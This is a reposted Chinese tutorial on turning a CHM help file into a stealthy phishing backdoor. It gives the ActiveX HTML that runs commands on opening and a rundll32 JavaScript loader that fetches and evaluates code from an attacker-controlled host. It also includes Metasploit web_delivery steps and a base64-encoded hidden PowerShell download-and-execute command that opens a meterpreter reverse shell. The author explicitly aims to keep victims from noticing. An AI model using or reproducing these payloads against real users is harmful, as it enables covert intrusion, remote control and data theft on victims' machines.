转载

高级组合技打造“完美” 捆绑后门

0x00 简介

之前写过一篇关于客户端钓鱼的文章：《使用powershell Client进行有效钓鱼》中，在使用各个Client进行测试的过程中，个人发现CHM文件是最好用的一个，但是其缺点就是会弹黑框，这样就会让被攻击者察觉。那么怎么让他不弹黑框呢？那就是本文要介绍的内容啦~

0x01 CHM 简介

在介绍怎么使用CHM来作为后门之前，首先要知道CMH是什么东西。

CHM（Compiled Help Manual）即“已编译的帮助文件”。它是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等，并可以通过URL与Internet联系在一起。因为使用方便，形式多样也被采用作为电子书的格式。

0x02 CHM 制作

CHM的制作方法很多。有多款工具可以使用，这里就不在做详细的介绍了。本次测试使用了EasyCHM来制作CHM文件，使用起来非常简单。

新建如下目录，文件内容随意：

高级组合技打造“完美” 捆绑后门

打开EasyCHM，新建->浏览。选择该目录。默认文件类型：

高级组合技打造“完美” 捆绑后门

点击确认，即可看到预览的CHM文件：

高级组合技打造“完美” 捆绑后门

选择编译，即可编译成CHM文件。

0x03 CHM Execute Command

[email protected]

在twitter上发了一个demo，通过CHM运行计算器：

高级组合技打造“完美” 捆绑后门

利用代码如下：

#!html <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec  <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut">  <PARAM name="Button" value="Bitmap::shortcut">  <PARAM name="Item1" value=',calc.exe'>  <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>

将以上代码写入html，置于工程目录进行编译，生成CHM文件，运行此文件，弹出计算器：

高级组合技打造“完美” 捆绑后门

0x04 去除弹框

有测试过nishang Out-CHM 的同学会发现，运行生成的CHM文件的时候会看到明显的弹框。就像这样:

高级组合技打造“完美” 捆绑后门

某个晚上突然脑洞了一下，想到了一个好的方式来让他不显示弹框，即结合使用JavaScript Backdoor。经过测试，成功实现在不弹框的情况下获取meterpreter会话，此次测试使用一个我修改过的python版 JSRat.ps1 ，地址为：https://github.com/Ridter/MyJSRat。使用方式详见 readme。

以下为完整的测试过程：

1、结合CHM + JSBackdoor

使用交互模式的JSRat server：

#!bash python MyJSRat.py -i 192.168.1.101 -p 8080

高级组合技打造“完美” 捆绑后门

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下：

#!bash rundll32.exe javascript:"/../mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

经过多次测试，成功将以上命令写入chm，其Html代码为：

#!html <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> This is a demo ! <br> <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut">  <PARAM name="Button" value="Bitmap::shortcut">  <PARAM name="Item1" value=',rundll32.exe,javascript:"/../mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>  <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>

编译以后运行，可以成功获取JS交互shell:

高级组合技打造“完美” 捆绑后门

直接执行 cmd /c command 是会有黑框的，可以使用run来避免显示黑框。执行run以后，输入 whoami > e:/1.txt 之后通过read 来获取回显。

2、获取meterpreter会话

此次测试获取meterpreter会话的方式是通过执行powershell命令，直接获取，当获取客户端JS 交互shell之后自动执行powershell命令，获取meterpreter会话。具体操作如下：

开启MSF web_delivery：

#!bash  ~  msfconsole -Lq msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 2 target => 2 msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(web_delivery) > set lhost 192.168.1.101 lhost => 192.168.1.101 msf exploit(web_delivery) > set lport 6666 lport => 6666 msf exploit(web_delivery) > set SRVPORT 8081 SRVPORT => 8081 msf exploit(web_delivery) > set uripath / uripath => / msf exploit(web_delivery) > exploit [*] Exploit running as background job. msf exploit(web_delivery) > [*] Started reverse TCP handler on 192.168.1.101:6666 [*] Using URL: http://0.0.0.0:8081/ [*] Local IP: http://192.168.1.101:8081/ [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

装有powershell的客户端执行以下命令则可获取meterpreter会话：

#!bash powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

由于存在特殊字符，我们可以把以上代码编码为base64格式，将以下代码存入power.txt

#!bash $n=new-object net.webclient; $n.proxy=[Net.WebRequest]::GetSystemWebProxy(); $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; IEX $n.downloadstring('http://192.168.1.101:8081/');

执行以下命令：

#!bash cat power.txt | iconv --to-code UTF-16LE |base64

高级组合技打造“完美” 捆绑后门

最终要执行的powershell命令为：

#!bash powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==

使用执行命令模式直接获取meterpreter会话：

#!bash python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="

测试过程中，从运行CHM到获取meterpreter，客户端无明显异常，全程无黑框弹出，获取到meterpreter会话如下图：

高级组合技打造“完美” 捆绑后门